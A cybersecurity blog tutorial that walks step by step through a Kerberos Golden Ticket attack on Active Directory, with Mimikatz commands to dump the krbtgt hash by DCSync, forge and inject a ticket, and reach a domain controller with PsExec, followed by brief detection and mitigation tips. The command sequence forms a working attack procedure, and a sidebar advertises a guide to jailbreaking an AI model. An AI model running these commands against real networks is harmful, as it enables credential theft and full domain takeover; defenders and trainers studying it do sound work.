Write
OneWriteup
  • Login
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

How to perform Golden Ticket Attack in Active Directory in 2025?

FOUNDER by FOUNDER
August 19, 2025
Reading Time: 7 mins read
23
0
Golden Ticket Attack
Share on FacebookShare on Twitter

What is a Golden Ticket?

A Golden Ticket is a forged Kerberos-Ticket Granting Ticket which grants complete access to AD environment.

What is Golden Ticket Attack?

Golden Ticket Attack is a type of cyberattack in Active Directory Environment. It exploits Microsoft  Kerberos Authentication Protocol which is windows default authentication protocol. The threat actor craft’s a golden ticket by compromising the “krbtgt” account , By using this golden ticket the attacker gets unrestricted access to an organization’s entire domain—including devices, files, and domain controllers.

Tools used for Golden Ticket Attack.

1. Mimikatz

  • It is a  well-known tool for extracting credentials from Windows memory, enabling attackers to retrieve password hashes, plaintext passwords, and Kerberos tickets, which can then be used to forge Golden Tickets.

2. Impacket

  • Its is a  Python toolkit for handling network protocols and includes utilities for tasks like remote execution and Kerberos ticket creation, particularly useful for generating Golden Tickets.

3. Rubeus

  • It is a  C# tool designed for managing Kerberos tickets, allowing attackers to request, inject, and manipulate tickets, including the use of Golden Tickets for persistent access.

4. Metasploit Framework

  • It is a  penetration testing framework with modules for exploiting, credential dumping, and post-exploitation; integrates with Mimikatz for injecting Golden Tickets to maintain privileged access in Active Directory.

Requirements for Golden Ticket Attack.

The attacker needs access to a machine that is part of the Active Directory environment and must have local administrator privileges on that machine to run Mimikatz with elevated permissions (“Run as Administrator”).

 

How to perform a Golden Ticket Attack?

Step 1: Download and Install Mimikatz

  1. Download the Mimikatz tool from the official GitHub repository:
    • https://github.com/ParrotSec/mimikatz
  2. Run Mimikatz as an Administrator to ensure it has the necessary privileges.Golden Ticket Attack

Step 2: Obtain Privilege Elevation in Mimikatz

  1. In the Mimikatz command prompt, elevate privileges by running:
    privilege::debug

Step 3: Dump the krbtgt NTLM Hash and SID

  1. Run the following command to retrieve the krbtgt NTLM hash and domain SID:
    lsadump::dcsync /domain:kserver.local /user:krbtgt

    Replace kserver.local with your actual domain name.
    Golden Ticket Attack

Step 4: Generate a Golden Ticket

  1. With the obtained NTLM hash and SID, use the following command to create a Golden Ticket:
    kerberos::golden /user:administrator /domain:kserver.local /sid:S-1-5-21-1202111685-2363350227-2141688259-502 /krbtgt:986ac3293eae2f5cc428808c41e8b894 /id:500
    • Explanation of parameters:
      • /user: Target user account (e.g., administrator).
      • /domain: Target domain (e.g., kserver.local).
      • /sid: Domain Security Identifier (SID).
      • /krbtgt: NTLM hash of the krbtgt account.
      • /id: User ID (typically 500 for admin).
    • This command saves the Golden Ticket to a file named ticket.kirbi.

Golden Ticket Attack

Step 5: Load the Golden Ticket

  1. Load the Golden Ticket into your session:
    kerberos::ptt ticket.kirbi

Golden Ticket Attack

Step 6: Open a New Command Prompt with the Ticket

  1. Start a new command prompt window to use the Golden Ticket with:
    misc::cmd

Step 7: Download and Set Up PsTools

  1. Download PsTools from Microsoft’s official website:
    • PsTools Download
  2. PsExec will allow remote command execution on the domain controller.

Step 8: Execute Commands Remotely

  1. In the Mimikatz command prompt, run PsExec to gain access to the domain controller:
    PsExec64.exe \\192.168.1.150 cmd.exe

Replace 192.168.1.150 with the IP or domain name of your target machine.Golden Ticket Attack

 

Complete Video Tutorial:

 

How to Detect Golden Ticket Attack at SIEM?

Event IDs to monitor:

  1. 4769: Service Ticket Request (TGS) — Can reveal suspicious service requests from high-privilege accounts.
  2. 4624 (Logon) — Look for direct logins or activity associated with the krbtgt account.

How to mitigate Golden Ticket Attack?

  1. Regularly Reset the krbtgt Account Password.
  2. Limit Privilege Escalation and Privileged Account Access.
  3. Implement Enhanced Kerberos Security Policies
  4. Apply LAPS (Local Administrator Password Solution)
  5. Use Smart Card Authentication or Multifactor Authentication (MFA)

Read Similar Articles:

What is Password Spraying Attack? Complete Practical Guide 2024.

Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].

FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

Beginner’s Guide to Reverse Engineering Malware with dnSpy

Beginner’s Guide to Reverse Engineering Malware with dnSpy.

August 19, 2025
127
DNS Based Data Exfiltration Using Burp Collaborator Client

DNS Based Data Exfiltration Using Burp Collaborator Client

August 19, 2025
134
Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

August 19, 2025
743
HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

August 19, 2025
868
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

100+ Top Essential Cybersecurity Terms : Your Cybersecurity Dictionary

100+ Top Essential Cybersecurity Terms : Your Cybersecurity Dictionary

August 19, 2025
144
How to set up Active Directory

How to set up Active Directory Domain Services In Windows Server 2022?

August 19, 2025
178

Popular Story

  • Beginner’s Guide to Reverse Engineering Malware with dnSpy

    Beginner’s Guide to Reverse Engineering Malware with dnSpy.

    23 shares
    Share 9 Tweet 6
  • Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    134 shares
    Share 54 Tweet 34
  • How to Configure OpenVPN Server for Multi Clients Setup in Windows?

    49 shares
    Share 20 Tweet 12
  • Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

    156 shares
    Share 62 Tweet 39
  • What is As-Rep Roasting attack in Active Directory and How does it work?

    34 shares
    Share 14 Tweet 9

Support This Write-Up. Fund the Next

OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • Disclaimer
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In